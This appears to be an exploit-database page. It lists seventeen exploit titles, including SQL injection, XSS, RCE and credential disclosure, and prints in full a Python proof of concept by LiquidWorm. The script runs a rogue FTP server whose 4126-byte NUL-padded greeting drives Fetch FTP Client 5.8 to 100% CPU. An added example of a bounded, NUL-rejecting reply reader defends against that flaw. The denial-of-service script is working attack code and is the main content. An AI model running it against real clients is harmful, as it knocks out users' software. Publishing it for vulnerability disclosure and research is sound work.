
17 changes to exploits/shellcodes

CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path
Mozilla Firefox 67 - Array.pop JIT Type Confusion
Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)
Chamilo LMS 1.11.14 - Account Takeover
Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
PHP Restaurants 1.0 - SQLi (Unauthenticated)
Moodle 3.11.4 - SQL Injection
Huawei DG8045 Router 1.0 - Credential Disclosure
PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
70 lines
No EOL
2 KiB
Python
Executable file
```python
# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm

#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER   PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND
# lqwrm  3498 100.0  0.5 60081236  54488   ??  R     5:44PM   4:28.97 Fetch-5K1354-266470421
# ~/Desktop>
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
#            macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#

import socket

# Listening address and FTP control port of the test server
host = '0.0.0.0'
port = 21

s = socket.socket()
s.bind((host, port))
s.listen(2)

print('Ascolto su', host, 'porta', port, '...')

# 220 greeting padded with 0x101E (4126) NUL bytes: the long server
# response (more than 2K bytes) named in the description above
consumptor = '220\x20'
consumptor += 'ftp.zeroscience.mk'
consumptor += '\x00' * 0x101E
consumptor += '\x0D\x0A'

while True:
    try:
        c, a = s.accept()
        print('Connessione da', a)
        print('CPU 100%, Memory++')
        c.send(bytes(consumptor, 'UTF-8'))
        c.send(b'Thricer OK, p\'taah\x0A\x0D')
        print(c.recv(17))
    except:
        # Any error or Ctrl-C ends the accept loop
        break
```
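
A client-side guard for the condition in the description, as an added example that is not part of the original file or of Fetch's code: it reads one FTP control reply with a size cap, a timeout and NUL rejection, so an oversized greeting costs bounded work. The names `read_reply_line` and `check_banner` and the 512-byte cap are assumptions, the banners are constructed, and the page does not say what inside Fetch causes the CPU loop.

```python
import socket

MAX_REPLY_LINE = 512  # assumed cap for this example; not a value from the page


class ReplyError(Exception):
    """A control-channel reply broke the client's limits."""


def read_reply_line(sock, limit=MAX_REPLY_LINE, timeout=5.0):
    """Read one CRLF-terminated FTP reply; return (code, text).

    Work is bounded: reading stops once `limit` bytes arrive without a
    CRLF, NUL bytes are refused, and a silent server hits the timeout.
    Bytes after the first CRLF are dropped to keep the example short.
    """
    sock.settimeout(timeout)
    buf = bytearray()
    while b"\r\n" not in buf:
        if len(buf) > limit:
            raise ReplyError("reply exceeds %d bytes" % limit)
        chunk = sock.recv(256)
        if not chunk:
            raise ReplyError("closed before CRLF")
        if b"\x00" in chunk:
            raise ReplyError("NUL byte in reply")
        buf += chunk
    line = bytes(buf).split(b"\r\n", 1)[0]
    if len(line) > limit:
        raise ReplyError("reply exceeds %d bytes" % limit)
    if len(line) < 4 or not line[:3].isdigit() or line[3:4] not in (b" ", b"-"):
        raise ReplyError("malformed reply code")
    return int(line[:3]), line[4:].decode("latin-1")


def check_banner(data):
    """Feed constructed banner bytes through a local socket pair."""
    server, client = socket.socketpair()
    try:
        server.sendall(data)
        server.close()
        return read_reply_line(client)
    except ReplyError as exc:
        return "rejected: %s" % exc
    finally:
        client.close()


if __name__ == "__main__":
    print(check_banner(b"220 ftp.example.test ready\r\n"))  # constructed
    print(check_banner(b"220 ftp.example.test" + b"\x00" * 0x101E + b"\r\n"))
```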